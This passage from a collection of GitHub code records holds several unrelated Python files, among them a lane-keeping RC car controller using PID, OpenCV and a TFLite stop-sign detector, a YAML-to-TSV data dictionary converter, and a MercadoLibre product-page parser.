start:\n            start = ev_start\n        if ev_end and (not end or ev_end > end):\n            end = ev_end\n\n    if minutes_padding:\n        start -= timedelta(minutes=minutes_padding)\n        end += timedelta(minutes=minutes_padding)\n\n    return start.strftime(_dtg_format), end.strftime(_dtg_format)\n\n\ndef build_icon_string(event):\n    sorted_analysis = sorted(event.items_of_interest, key=itemgetter('importance'), reverse=True)\n    out = \"\"\n    for obj in sorted_analysis:\n        title = obj['name'] if 'name' in obj else obj['label']\n        if 'icon' in obj and obj['importance'] > 1:\n            out += \"\".format(\n                obj['icon'], obj['label'], title.title())\n    return out\n\n\ndef date_time(dtg, _dtg_format):\n    if type(dtg) == str:\n        dtg = datetime.strptime(dtg, _dtg_format)\n    return dtg\n\n\ndef center_of_rect(box, image=None):\n    coord = [box['x_min'], box['y_min'], box['x_max'], box['y_max']]\n    center = [coord[0] + (coord[2] / 2), coord[1] + (coord[3] / 2)]\n    if image and image.image and image.image.height:\n        center[0] = center[0] / image.image.width\n        center[1] = center[1] / image.image.height\n    return center\n\n\ndef point_in_polygon(polygon, point):\n    \"\"\"\n    From: https://www.algorithms-and-technologies.com/point_in_polygon/python\n\n    Raycasting Algorithm to find out whether a point is in a given polygon.\n    Performs the even-odd-rule Algorithm to find out whether a point is in a given polygon.\n    This runs in O(n) where n is the number of edges of the polygon.\n    *\n    :param polygon: an array representation of the polygon where polygon[i][0] is the x Value of the i-th point and polygon[i][1] is the y Value.\n    :param point: an array representation of the point where point[0] is its x Value and point[1] is its y Value\n    :return: whether the point is in the polygon (not on the edge, just turn < into <= and > into >= for that)\n    \"\"\"\n\n    # A point is in a polygon if a line from the point to infinity crosses the polygon an odd number of times\n    odd = False\n    # For each edge (In this case for each point of the polygon and the previous one)\n    i = 0\n    j = len(polygon) - 1\n    while i < len(polygon) - 1:\n        i = i + 1\n        # If a line from the point into infinity crosses this edge\n        # One point needs to be above, one below our y coordinate\n        # ... and the edge doesn't cross our Y coordinate before our x coordinate (but between our x coordinate and infinity)\n\n        if (((polygon[i][1] > point[1]) != (polygon[j][1] > point[1])) and (point[0] < (\n                (polygon[j][0] - polygon[i][0]) * (point[1] - polygon[i][1]) / (polygon[j][1] - polygon[i][1])) +\n                polygon[i][0])):\n            # Invert odd\n            odd = not odd\n        j = i\n    # If the number of crossings was odd, the point is in the polygon\n    return odd
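\n\n# e.g., point_in_polygon([[0, 0], [4, 0], [4, 4], [0, 4]], [2, 2]) returns True, while [5, 2] gives False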
\n","repo_name":"jaycrossler/watcher_appdaemon_plugin","sub_path":"string_helpers.py","file_name":"string_helpers.py","file_ext":"py","file_size_in_byte":8655,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"}
+{"seq_id":"31257982853","text":"import json\nimport os\nimport yaml\nimport argparse\nfrom collections import OrderedDict\nfrom datetime import datetime\nimport pandas\n\n'''Be sure to update the doc strings, so they are coherent and helpful.'''\n\ndef setup():\n    '''Performs all setup necessary to run convert_dictionary().'''\n    parse_options()\n    create_output_path()\n    create_master_out()\n\ndef parse_options():\n    '''Obtain path_to_schemas and name of output directory.'''\n    global args\n\n    parser = argparse.ArgumentParser(description=\"Obtain path_to_schemas and name of output directory.\")\n    parser.add_argument(\"-p\", \"--path_to_schemas\", dest=\"path_to_schemas\", required=True, help=\"Path to input schemas, relative to directory dictionary_tools.\")\n    parser.add_argument(\"-o\", \"--out_dir_name\", dest=\"out_dir_name\", required=False, help=\"Name of output directory.\")\n\n    args = parser.parse_args()\n\n    return args\n\ndef mkdir(directory):\n    '''Create directory if it does not already exist.'''\n    if not os.path.exists(directory):\n        os.makedirs(directory)\n\ndef create_output_path():\n    '''Create path to the output directory: dictionary_tools/output/get_tsv/'''\n    global out_path\n\n    if args.out_dir_name:\n        out_dir_name = args.out_dir_name\n    else:\n        out_dir_name = datetime.strftime(datetime.now(), 'output_tsv_%m.%d_%H.%M')\n\n    out_path = '../../output/get_tsv/' + out_dir_name + '/'\n\n    mkdir(out_path)\n\ndef create_master_out():\n    global master_out\n    master_out = {'nodes': [], 'variables': []}\n\ndef get_input_dict():\n    '''Returns a list containing all the filenames from the input dictionary.'''\n    global path_to_schemas\n\n    # path from args, relative to dictionary_tools/\n    # e.g., input/dictionaries/gdcdictionary/gdcdictionary/schemas/\n    path_to_schemas = '../../' + args.path_to_schemas\n\n    if path_to_schemas[-1] != '/':\n        path_to_schemas += '/'\n\n    input_dict 
= os.listdir(path_to_schemas)\n\n    return input_dict\n\ndef get_schema(schema_file):\n    '''Load and return contents of schema_file as dictionary.'''\n    path = path_to_schemas + schema_file\n    # 'input/dictionaries/gdcdictionary/gdcdictionary/schemas/' + 'sample.yaml'\n\n    schema_dict = yaml.safe_load(open(path))\n\n    return schema_dict\n\ndef get_headers():\n    '''Could create a config file.. for now just loading here.'''\n    nodes_head = ['<node>', '<node_action>', '<title>', '<category>', '<submittable>', '<description>', '<link_name>', '<backref>', '<label>', '<target>', '<multiplicity>', '<link_required>', '<link_group_required>', '<group_exclusive>']\n    var_head = ['<node>', '<field_action>', '<field>', '<description>', '<type>', '<options_action>', '<options>', '<required>', '<term>']\n\n    return nodes_head, var_head\n\ndef write_out():\n    '''\n    Eventually:\n    out.to_csv(path_or_buf='test_out.tsv', sep='\\t', index=False, columns=head)\n\n    where 'out' is a pandas DataFrame isomorphic to the desired output tsv\n    '''\n    nodes_out = pandas.DataFrame(master_out['nodes'])\n    variables_out = pandas.DataFrame(master_out['variables'])\n\n    # out_path = '../../output/get_tsv/' + out_dir_name + '/'\n    # presently only creating the master nodes and var's TSV files\n    # can create the pairs for individual nodes l8r\n\n    mkdir(out_path)\n\n    nodes_path = out_path + 'nodes.tsv'\n    variables_path = out_path + 'variables.tsv'\n\n    nodes_head, var_head = get_headers()\n\n    nodes_out.to_csv(path_or_buf=nodes_path, sep='\\t', index=False, columns=nodes_head, encoding='utf-8')\n    variables_out.to_csv(path_or_buf=variables_path, sep='\\t', index=False, columns=var_head, encoding='utf-8')\n\n# okay\ndef convert_dictionary():\n    '''Creates a collection of nodes and variables TSV files corresponding to the input dictionary.'''\n    schema_files = get_input_dict()\n\n    # can put this elsewhere\n    ignore_schemas = ['projects', 'README.md', '_definitions.yaml', '_settings.yaml', '_terms.yaml', '.DS_Store']\n\n    for schema_file in sorted(schema_files):\n        if schema_file not in ignore_schemas:\n            convert_schema(schema_file)\n\n# incomplete subroutines\ndef convert_schema(schema_file):\n    schema = get_schema(schema_file)\n\n    # 'sample', 'case', etc.\n    node = schema['id']\n\n    # put variables rows in master_out\n    get_variables(node, schema)  # okay\n\n    # put nodes row in master_out\n    get_nodes(node, schema)  # okay\n\ndef list_to_str(lst):\n    '''If lst is a list, converts lst to the appropriate string representation of this list used in the TSV files.\n    Else lst is returned untouched.\n    '''\n    if type(lst) is list:\n        lst = str(lst)[1:-1].replace('\\'', '')\n\n    return lst
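\n\n# e.g., list_to_str(['breast', 'lung']) returns 'breast, lung'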
\n\ndef get_link_names(schema_dict):\n    '''Return a list containing all the link names from the links section of the given schema dictionary.'''\n    link_names = []\n\n    try:\n        links = schema_dict['links']\n        for link in links:\n            if 'subgroup' in link:\n                group = link['subgroup']\n                for item in group:\n                    link_names.append(item['name'])\n            else:\n                link_names.append(link['name'])\n\n    except KeyError:\n        print('no links for - ' + schema_dict['id'])\n\n    return link_names\n\n# okay\ndef get_variables(node, schema):\n    var_list = schema['properties']\n\n    link_names = get_link_names(schema)\n    req_vars = schema['required']\n\n    for req_var in req_vars:\n        if req_var not in var_list:\n            handle_req_var(node, req_var)\n\n    for var in sorted(var_list):\n        if var not in link_names and var != '$ref':\n            var_block = var_list[var]\n            handle_var(node, var, var_block, req_vars)\n\ndef handle_req_var(node, req_var):\n    # make this and other instances like it come from a template which is created once\n    row = {'<node>': node,\n           '<field_action>': None,\n           '<field>': req_var,\n           '<description>': None,\n           '<type>': None,\n           '<options>': None,\n           '<options_action>': None,\n           '<required>': 'True',\n           '<term>': None\n           }\n\n    master_out['variables'].append(row)\n\n# okay - see notes here\ndef handle_var(node, var, var_block, req_vars):\n    '''Construct dictionary (row) corresponding to this variable.'''\n\n    # note: some properties only have $ref listed, for the whole block\n    # these get their type listed as 'enum' presently, which is incorrect\n\n    # presently ignoring <field_action> and <options_action> since these will be blank columns\n    # definitely make this a template in another function or something\n    row = {'<node>': node,\n           '<field_action>': None,\n           '<field>': var,\n           '<description>': var_block.get('description'),\n           '<type>': var_block.get('type', 'enum'),  # some property type entries are lists - see acknowledgement.yaml#/properties/submitter_id\n           '<options>': list_to_str(var_block.get('enum')),  # not sure if this will work - will probably have to convert list into string list\n           '<options_action>': None,\n           '<required>': var in req_vars,\n           '<term>': var_block.get('term', {'$ref': None})['$ref']\n           }\n\n    # remaining things to handle - probably <options>\n    # maybe convert boolean <required> to yes/no? - hopefully not\n    master_out['variables'].append(row)\n\n# okay - see janky subroutine\ndef get_nodes(node, schema):\n    '''Construct dictionary (row) corresponding to this schema and its link section.'''\n\n    row = {'<node>': node,\n           '<node_action>': 'add',  # only using this default value for now, for the demo - can remove later\n           '<title>': schema['title'],\n           '<category>': schema['category'],\n           '<submittable>': schema['submittable'],\n           '<description>': schema['description']\n           }\n\n    row.update(handle_links(row, schema))\n\n    master_out['nodes'].append(row)\n\n# impressively janky, but should work\ndef handle_links(row, schema):\n    '''Here we convert the links section from schema to spreadsheet format.'''\n    try:\n        links = schema['links']\n\n    except KeyError:\n        print('no links for - ' + schema['id'])\n        return {}\n\n    out = {'<link_name>': [],\n           '<backref>': [],\n           '<label>': [],\n           '<target>': [],\n           '<multiplicity>': [],\n           '<link_required>': [],\n           '<link_group_required>': [],\n           '<group_exclusive>': []}\n\n    '''\n    Notes\n    Groups of properties:\n    1. <backref>\n    2. <link_group_required>, <group_exclusive>\n    3. 
the rest\n\n Definitely encapsulate these bigger code blocks.\n Maybe create a lookup table for headers <-> yaml keys\n '''\n\n for link in links:\n if 'subgroup' in link:\n\n # 1\n if out['<backref>'] == []:\n out['<backref>'].append(link['subgroup'][0]['backref'])\n\n # 2\n out['<link_group_required>'].append(link['required'])\n out['<group_exclusive>'].append(link['exclusive'])\n\n # 3\n sub_out = {'<link_name>': [],\n '<label>': [],\n '<target>': [],\n '<multiplicity>': [],\n '<link_required>': []\n }\n\n group = link['subgroup']\n\n for item in group:\n sub_out['<link_name>'].append(item['name'])\n sub_out['<label>'].append(item['label'])\n sub_out['<target>'].append(item['target_type'])\n sub_out['<multiplicity>'].append(item['multiplicity'])\n sub_out['<link_required>'].append(item['required'])\n\n # uh yeah fix this ^\n\n for key in sub_out:\n out[key].append(sub_out[key])\n\n else:\n # 1\n if out['<backref>'] == []:\n out['<backref>'].append(link['backref'])\n\n # 3 - notice identical block to above\n out['<link_name>'].append(link['name'])\n out['<label>'].append(link['label'])\n out['<target>'].append(link['target_type'])\n out['<multiplicity>'].append(link['multiplicity'])\n out['<link_required>'].append(link['required'])\n\n for key in out:\n out[key] = list_to_str(out[key])\n\n # print json.dumps(out, indent=2)\n\n return out\n\nif __name__ == \"__main__\":\n\n setup()\n convert_dictionary()\n write_out() # should I put this in convert_dictionary()? what difference does it make\n","repo_name":"uc-cdis/planx-bioinfo-tools","sub_path":"dictionary_tools/code/get_tsv/get_tsv.py","file_name":"get_tsv.py","file_ext":"py","file_size_in_byte":10448,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"95"} +{"seq_id":"29267089591","text":"import unittest\n\ntestmodules = []\ntests = ['project', 'programs']\nprefix = 'test_'\nsuffix = '.py'\n\nfor test in tests: testmodules.append(prefix+test)\n\nsuite = unittest.TestSuite()\n\nfor t in testmodules:\n suite.addTest(unittest.defaultTestLoader.loadTestsFromName(t))\ntest_runner = unittest.TextTestRunner().run(suite)","repo_name":"optimamodel/optima-tb","sub_path":"tests/run_alltests.py","file_name":"run_alltests.py","file_ext":"py","file_size_in_byte":320,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"95"} +{"seq_id":"12732444991","text":"# %%\n# ref: User raja_961, “Autonomous Lane-Keeping Car Using Raspberry Pi and OpenCV”. Instructables. 
URL: https://www.instructables.com/Autonomous-Lane-Keeping-Car-Using-Raspberry-Pi-and/\n\n# import necessary libraries\nimport time\nimport cv2\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport math\nimport tflite_runtime.interpreter as tflite\n\n\n# %%\n# incremental PID\nclass PidClass:\n    p = 0\n    i = 0\n    d = 0\n\n    error_last = 0\n    error_last2 = 0\n\n    def __init__(self, p, i, d):\n        self.p = p\n        self.i = i\n        self.d = d\n\n    def get(self, error):\n        # p\n        output = self.p * (error - self.error_last)\n        # i\n        output += self.i * error\n        # d\n        output += self.d * (error - 2*self.error_last + self.error_last2)\n        self.error_last2 = self.error_last\n        self.error_last = error\n        return output\n\n# location PID\n\n\nclass PidClass2:\n    p = 0\n    i = 0\n    d = 0\n\n    error_i = 0\n    error_last = 0\n\n    def __init__(self, p, i, d):\n        self.p = p\n        self.i = i\n        self.d = d\n\n    def get(self, error):\n        # p\n        output = self.p * error\n        # i\n        self.error_i += error\n        output += self.i * self.error_i\n        # d\n        output += self.d * (error - self.error_last)\n        self.error_last = error\n        return output\n\n# control speed\n\n\nclass Speed:\n\n    target_speed = 0\n    current_speed = 0\n    current_count = 0\n    current_output = 0\n    # save the intermediate values\n    data = dict()\n\n    def __init__(self, target_speed, p, i, d):\n        self.target_speed = target_speed\n        self.pid = PidClass(p, i, d)\n        self.data[\"current_count\"] = []\n        self.data[\"current_speed\"] = []\n        self.data[\"current_output\"] = []\n        self.data[\"time\"] = []\n\n    # return the number of counts after last read\n    def get_count(self):\n        # get the count from the hello module\n        with open('/sys/module/hello/parameters/count', 'r') as filetowrite:\n            new_count = filetowrite.readline()\n        # rm \"\\n\"\n        new_count = new_count[:-1]\n        # convert str to int\n        new_count = int(new_count)\n        # how many counts after last read\n        count = new_count - self.current_count\n        # save current value\n        self.current_count = new_count\n        return count\n\n    # return the time interval between the i'th and (i+1)'th encoder triggers\n    def get_time(self, i):\n        # parameter: x0 to x4\n        with open('/sys/module/hello/parameters/x' + str(i), 'r') as filetowrite:\n            time = filetowrite.readline()\n        # rm \"\\n\"\n        time = time[:-1]\n        # convert str to int\n        time = int(time)\n        return time\n\n    # return current speed\n    def get_speed(self):\n        # get number of counts after last read\n        count = self.get_count()\n        self.data[\"current_count\"].append(count)\n        if count == 0:\n            # no movement, return 0\n            self.data[\"current_speed\"].append(0)\n            return 0\n        # we only have the last 5 time intervals\n        count = min(count, 5)\n        time_list = np.zeros(count)\n        for i in range(count):\n            # read the time interval\n            time_list[i] = (self.get_time(i)+1)\n        # average the time intervals and calculate the speed\n        speed = 1000/np.average(time_list)\n        self.data[\"current_speed\"].append(speed)\n        return speed\n\n    def init_pwm(self):\n        # period: 20000000\n        with open('/dev/bone/pwm/1/a/period', 'w') as filetowrite:\n            filetowrite.write('20000000')\n        # duty_cycle: 7.5%\n        with open('/dev/bone/pwm/1/a/duty_cycle', 'w') as filetowrite:\n            filetowrite.write('1500000')\n        # enable\n        with open('/dev/bone/pwm/1/a/enable', 'w') as filetowrite:\n            filetowrite.write('1')\n\n    def set_speed(self, value):\n        # only allow values between 0 and 100\n        value = max(0, min(100, value))\n        self.current_output = value\n        # convert output to pwm\n        pwd = str(int(value * 4000 + 1500000))\n        # set pwm\n        with open('/dev/bone/pwm/1/a/duty_cycle', 'w') as filetowrite:\n            filetowrite.write(pwd)\n        return 
value\n\n def update(self):\n self.data[\"time\"].append(time.time())\n # get speed\n self.current_speed = self.get_speed()\n # get error\n speed_error = self.target_speed - self.current_speed\n # get the pid output\n speed_pid = self.pid.get(speed_error)\n # add the pid output to current speed output\n self.current_output += speed_pid\n # set speed output\n self.current_output = self.set_speed(self.current_output)\n self.data[\"current_output\"].append(self.current_output)\n\n\nclass Camera:\n # camera\n height = 240\n width = 320\n fps = 10\n # red paper\n red_threshold = 0.5 * height/2 * width\n # yolo\n model_size = 320\n model_path = \"/home/debian/elec533/best-fp16-3.tflite\"\n conf_threshold = 0.5\n iou_threshold = 0.45\n # save the intermidiate value\n data = dict()\n\n def __init__(self):\n # init camera\n self.cam = cv2.VideoCapture(2)\n self.cam.set(cv2.CAP_PROP_FRAME_WIDTH, self.width)\n self.cam.set(cv2.CAP_PROP_FRAME_HEIGHT, self.height)\n self.cam.set(cv2.CAP_PROP_FPS, self.fps)\n # init data\n self.data[\"red_mask\"] = []\n self.data[\"k\"] = []\n self.data[\"time\"] = []\n self.data[\"frame\"] = []\n self.data[\"stop\"] = []\n # init model\n self.interpreter = tflite.Interpreter(\n model_path=self.model_path, num_threads=2)\n self.interpreter.allocate_tensors()\n self.output = self.interpreter.get_output_details()[0]\n self.input = self.interpreter.get_input_details()[0]\n\n def detect_stop(self, frame):\n # pre-process img\n frame = cv2.cvtColor(frame, cv2.COLOR_BGR2RGB)\n frame = cv2.resize(frame, (self.model_size, self.model_size))\n frame = frame.astype(np.float32)/255\n input_data = np.expand_dims(frame, axis=0)\n # process img\n self.interpreter.set_tensor(self.input['index'], input_data)\n self.interpreter.invoke()\n output_data = self.interpreter.get_tensor(self.output['index'])[0]\n # post-process img\n class_id = []\n boxes = []\n confs = []\n for i in range(output_data.shape[0]):\n confidence = output_data[i][4]\n # confidence threshold\n if confidence > self.conf_threshold:\n center_x = int(output_data[i][0] * self.width)\n center_y = int(output_data[i][1] * self.height)\n width = int(output_data[i][2] * self.width)\n height = int(output_data[i][3] * self.height)\n # convert box format for cv2.dnn.NMSBoxes\n left = center_x - width / 2\n top = center_y - height / 2\n class_id.append(0)\n confs.append(float(confidence))\n boxes.append([left, top, width, height])\n # NMS (not necessary)\n indices = cv2.dnn.NMSBoxes(\n boxes, confs, self.conf_threshold, self.iou_threshold)\n # self.display_box(boxes, confs, indices)\n # is there any stop sign\n for index in indices:\n i = index[0]\n box = boxes[i]\n return True\n return False\n\n def detect_red(self, hsv):\n # pink to red\n lower_red = np.array([140, 20, 40], dtype=\"uint8\")\n upper_red = np.array([200, 255, 255], dtype=\"uint8\")\n mask = cv2.inRange(hsv, lower_red, upper_red)\n # cv2.imshow(\"red\",mask)\n # get number of red\n count = mask.sum()/255\n self.data[\"red_mask\"].append(count)\n return (count > self.red_threshold)\n\n def detect_blue(self, hsv):\n # light blue to dark blue\n lower_blue = np.array([70, 90, 0], dtype=\"uint8\")\n upper_blue = np.array([150, 255, 255], dtype=\"uint8\")\n mask = cv2.inRange(hsv, lower_blue, upper_blue)\n # cv2.imshow(\"blue\",mask)\n return mask\n\n def display_box(self, boxes, confs, indices, line_color=(0, 255, 0), line_width=1):\n # background\n line_image = np.zeros([self.height, self.width, 3], np.uint8)\n\n for index in indices:\n i = index[0]\n left = 
int(boxes[i][0])\n top = int(boxes[i][1])\n width = int(boxes[i][2])\n height = int(boxes[i][3])\n # add box\n cv2.rectangle(line_image, (left, top), (left+width,\n top+height), line_color, line_width)\n # add confidence\n cv2.putText(line_image, str(\n confs[i]), (left, top+height), cv2.FONT_HERSHEY_SIMPLEX, 1, line_color, line_width)\n cv2.imshow(\"stop\", line_image)\n\n def display_lines(self, lines, line_color=(0, 255, 0), line_width=1):\n # background\n line_image = np.zeros([self.height, self.width, 3], np.uint8)\n\n for line in lines:\n for x1, y1, x2, y2 in line:\n # add line\n cv2.line(line_image, (x1, y1), (x2, y2),\n line_color, line_width)\n cv2.imshow(\"lines\", line_image)\n\n def detect_lines(self, mask):\n # detect edges\n edges = cv2.Canny(mask, 50, 100)\n # cv2.imshow(\"edges\",edges)\n rho = 1\n theta = np.pi / 180\n min_threshold = 40\n # get lines\n line_segments = cv2.HoughLinesP(edges, rho, theta, min_threshold,\n np.array([]), minLineLength=20, maxLineGap=20)\n if line_segments is None:\n # no line!\n return 0\n # self.display_lines(line_segments)\n left = []\n right = []\n for line in line_segments:\n # calculate the theta\n theta = math.atan((line[0][3]-line[0][1]) /\n (line[0][2]-line[0][0]+0.1))\n # we don't need horizontal lines\n if theta > 0.1:\n right.append(theta)\n elif theta < -0.1:\n left.append(theta)\n # average left\n left_theta = np.average(left) if left else 0\n # average right\n right_theta = np.average(right) if right else 0\n return (left_theta + right_theta)\n\n def update(self):\n # get image\n _, frame = self.cam.read()\n # save the image\n _, jpg = cv2.imencode(\".jpg\", frame)\n self.data[\"frame\"].append(jpg)\n # cv2.imshow(\"frame\",frame)\n self.data[\"time\"].append(time.time())\n # get the hsv of half image for red detection and line detection\n hsv = cv2.cvtColor(frame[int(self.height/2):, :, :], cv2.COLOR_BGR2HSV)\n # red detection\n red = self.detect_red(hsv)\n # blue detection\n blue_mask = self.detect_blue(hsv)\n # line detection\n theta = self.detect_lines(blue_mask)\n # stop sign detection\n stop = self.detect_stop(frame)\n return [red, stop, theta]\n\n def close(self):\n # close camera\n self.cam.release()\n # output the image files\n for i, jpg in enumerate(self.data[\"frame\"]):\n with open(str(i)+'.jpg', 'wb') as filetowrite:\n filetowrite.write(jpg.tobytes())\n\n\nclass Direction:\n\n target_direction = 0\n current_direction = 0\n current_output = 0\n # save the intermidiate value\n data = dict()\n\n def __init__(self, p, i, d):\n self.pid = PidClass2(p, i, d)\n self.data[\"current_direction\"] = []\n self.data[\"current_output\"] = []\n self.data[\"red\"] = []\n self.data[\"time\"] = []\n # init camera\n self.cam = Camera()\n\n def init_pwm(self):\n # period: 20000000\n with open('/dev/bone/pwm/1/b/period', 'w') as filetowrite:\n filetowrite.write('20000000')\n # duty_cycle: 7.5%\n with open('/dev/bone/pwm/1/b/duty_cycle', 'w') as filetowrite:\n filetowrite.write('1500000')\n # enable\n with open('/dev/bone/pwm/1/b/enable', 'w') as filetowrite:\n filetowrite.write('1')\n\n def set_direction(self, value):\n # value should be -100 t0 100\n value = max(-100, min(100, value))\n # convert value to pwm\n pwd = str(int(value * 3000 + 1500000))\n with open('/dev/bone/pwm/1/b/duty_cycle', 'w') as filetowrite:\n filetowrite.write(pwd)\n return value\n\n def update(self):\n # get results from camera\n red, stop, theta = self.cam.update()\n self.data[\"time\"].append(time.time())\n self.data[\"current_direction\"].append(theta)\n # 
get the pid output\n        self.current_output = self.pid.get(theta)\n        # set the pwm\n        self.current_output = self.set_direction(self.current_output)\n        self.data[\"current_output\"].append(self.current_output)\n        return red, stop\n\n    def close(self):\n        self.cam.close()\n\n\n# %%\n# init speed with target speed 200, p 0.05, i 0.01, d 0.01\nspeed = Speed(200, 0.05, 0.01, 0.01)\n# init speed pwm\nspeed.init_pwm()\n# init direction with p 60, i 0, d 0\ndirection = Direction(60, 0, 0)\n# init direction pwm\ndirection.init_pwm()\n\n\n# %%\n# stop_count: how many loops the car should stay stopped\nstop_count = 0\n# cooldown for red and stop signal\n# don't stop again immediately after a stop\nred_cooldown = 25\n# how many red papers the car has stopped for\nred_count = 0\n# how many stop signs the car has stopped for\nsign_count = 0\n# total time, about 45 secs\nrun_loop = 300\nfor _ in range(run_loop):\n    # is the car required to stop\n    if stop_count:\n        # count--\n        stop_count -= 1\n        # stop\n        speed.set_speed(0)\n    else:\n        # update the speed\n        speed.update()\n    # update the direction, and get the red and stop sign\n    red, stop = direction.update()\n    # don't stop again immediately after a stop\n    if red_cooldown > 0:\n        red_cooldown -= 1\n    # if this is the first red paper\n    elif red and red_count == 0:\n        # stop 10 loops\n        stop_count = 10\n        # set cooldown to 25\n        red_cooldown = 25\n        # add the red count\n        red_count = 1\n    # if this is the second red paper\n    elif red and red_count == 1:\n        # stop\n        speed.set_speed(0)\n        # We made it! break the loop.\n        break\n    # if there is a stop sign\n    if red_cooldown == 0 and stop and sign_count == 0:\n        # stop 10 loops\n        stop_count = 10\n        # set cooldown to 25\n        red_cooldown = 25\n        # add the sign count\n        sign_count = 1\n\n# stop forever\nspeed.set_speed(0)\n# go straight\ndirection.set_direction(0)\n","repo_name":"nicolechen63/elec533","sub_path":"let go.py","file_name":"let go.py","file_ext":"py","file_size_in_byte":14771,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"} +{"seq_id":"33503360826","text":"import json\n\nwith open(f'MSRVTT-QA/train_qa.json') as f:\n    ds = json.load(f)\n\nfreq_dict = {}\nfor item in ds:\n    answer = item['answer']\n    if answer not in freq_dict:\n        freq_dict[answer] = 0\n    freq_dict[answer] += 1\n\nans_count = sorted([(k, v) for k, v in freq_dict.items()], key=lambda x: x[1], reverse=True)\n\ndic_size = 2000\nmin_count = min([x[1] for x in ans_count][:dic_size])\ncand_set = [x[0] for x in ans_count if x[1] >= min_count]\nprint(len(cand_set))\n\nwith open(f'MSRVTT-QA/vocab_2k.json', 'w') as f:\n    json.dump(cand_set, f)\n\n","repo_name":"rowanz/merlot_reserve","sub_path":"demo/zero_shot_qa/build_vocab.py","file_name":"build_vocab.py","file_ext":"py","file_size_in_byte":550,"program_lang":"python","lang":"en","doc_type":"code","stars":126,"dataset":"github-code","pt":"95"} +{"seq_id":"41713730401","text":"import threading\nimport logging\n\nfrom ..lib.Services import get_soup_from_url, clean_string\n\n\ndef split_status_amount(text):\n    splitted_text = text.split(' - ')\n    status = None\n    amount = 0\n    if len(splitted_text) > 1:\n        status, n_vendidos = splitted_text\n        # example: 9 Vendidos\n        parsed_text = n_vendidos.split(' ')\n        if len(parsed_text) == 2:\n            amount = int(parsed_text[0])\n    else:\n        status = splitted_text[0]\n    return (status, amount)\n\n\ndef parse_location(location_div):\n    try:\n        location = location_div.select(\".card-description\")[0]\n        return location['title']\n    except IndexError as err:\n        logging.error(\"Error parsing location! %s\", err)\n        return \"N/A\"\n
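\n# Editor's note (illustrative example, not in the original source): given the parsing above,\n# split_status_amount(\"Nuevo - 9 Vendidos\") returns (\"Nuevo\", 9), while\n# split_status_amount(\"Usado\") returns (\"Usado\", 0).\n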
\n\ndef parse_specs_list(specs_list):\n    try:\n        return [{'spec_name': spec.strong.contents[0], 'spec_value': spec.span.contents[0]} for spec in specs_list]\n    except IndexError as err:\n        logging.error(\"Error getting item specs: %s\", specs_list)\n        return []\n\n\ndef parse_description(description_ele):\n    try:\n        if len(description_ele) == 0:\n            return \"\"\n        contents = description_ele[0].p.contents\n        clean_content = []\n        for p in contents:\n            # check if the variable is string, otherwise it could be a <br/> tag, just skip them\n            is_str = isinstance(p, str)\n            if is_str: clean_content.append(p)\n        clean_content = \" | \".join(clean_content)\n        return clean_string(clean_content)\n    except IndexError as err:\n        logging.error(\"Error parsing item description: %s\", description_ele)\n        return \"\"\n\n\n'''\nThe following conditions determine whether an item is stored to ElasticSearch or not\nPrice < $25 & Sales > 25U\nPrice >= $25 & Sales > 50U \n'''\n\n\ndef is_product_interesting(price, sales):\n    if (price < 25 and sales > 25) or (price >= 25 and sales > 50):\n        return True\n    else:\n        return False\n\n\nclass ItemParser(threading.Thread):\n    def __init__(self, q, result):\n        threading.Thread.__init__(self)\n        self.result = result\n        self.q = q\n\n    def run(self):\n        while not self.q.empty():\n            item_work = self.q.get()  # fetch a new item from the queue\n            full_item_info = {}\n            try:\n                logging.debug(\"Requested work... %i\" % item_work[0])\n                item_soup = get_soup_from_url(item_work[1]['link'])\n                # extract item info\n                item_info = item_soup.select(\"#short-desc > div\")[0]\n                item_name = item_info.select(\".item-title__primary\")[0].contents[0]\n                # calculate item price\n                item_price_fraction = clean_string(item_info.select(\".price-tag-fraction\")[0].contents[0])\n                item_price_fraction = item_price_fraction.replace(\".\", \"\")  # 2.000 is converted to 2000\n                item_price_cents = item_info.select(\".price-tag-cents\")\n                if len(item_price_cents) == 1: item_price_cents = clean_string(item_price_cents[0].contents[0])\n                else: item_price_cents = '00'\n                item_price = float(item_price_fraction + '.' 
+ item_price_cents)\n\n item_status_amount = item_info.select(\".item-conditions\")[0].contents[0]\n item_status_amount = clean_string(item_status_amount)\n extra_data = split_status_amount(item_status_amount)\n\n # extract seller location\n seller_location = item_soup.select(\".seller-location\")\n location = \"N/A\"\n if len(seller_location) > 0:\n location = parse_location(seller_location[0])\n\n # extract item specs\n item_specs = item_soup.select(\".specs-item\")\n item_specs_list = parse_specs_list(item_specs)\n\n # extract item description\n item_description = item_soup.select(\".item-description__text\")\n item_description_text = parse_description(item_description)\n\n # extract id and metadata from item\n item_id = item_soup.select(\"#productInfo > input:nth-child(1)\")[0]['value']\n parent_url = item_soup.select(\"#productInfo > input:nth-child(2)\")[0]['value']\n\n full_item_info['item_name'] = clean_string(item_name)\n full_item_info['item_price'] = item_price\n full_item_info['sold_so_far'] = extra_data[1]\n full_item_info['status'] = extra_data[0]\n full_item_info['location'] = location\n full_item_info['specs'] = item_specs_list\n full_item_info['characteristics'] = item_description_text\n full_item_info['id'] = item_id\n full_item_info['parent_url'] = parent_url\n full_item_info['original_url'] = item_work[1]['link']\n # the following values are added later in the process\n # item['subsection_name']\n # item['section_name']\n logging.debug(\"Full item info %s: \", full_item_info)\n\n # if product match the conditions add it\n if is_product_interesting(item_price, extra_data[1]):\n self.result[item_work[0]] = full_item_info\n # otherwise just skipped\n else:\n self.result[item_work[0]] = None\n except Exception as err:\n logging.error('Error with URL: %s, error: %s', item_work[1]['link'], err)\n self.result[item_work[0]] = None\n self.q.task_done()\n return True\n","repo_name":"rubancar/mercadolibre-scrapper","sub_path":"src/MercadoLibre/ItemParser.py","file_name":"ItemParser.py","file_ext":"py","file_size_in_byte":5603,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"} +{"seq_id":"38326197212","text":"import rawpy\nimport numpy as np\n#import imageio\nimport cv2\nimport os\nimport sys\nimport time\nimport argparse\n\n# Save the file named imgname as destname assuming imgname is a raw picture format. 
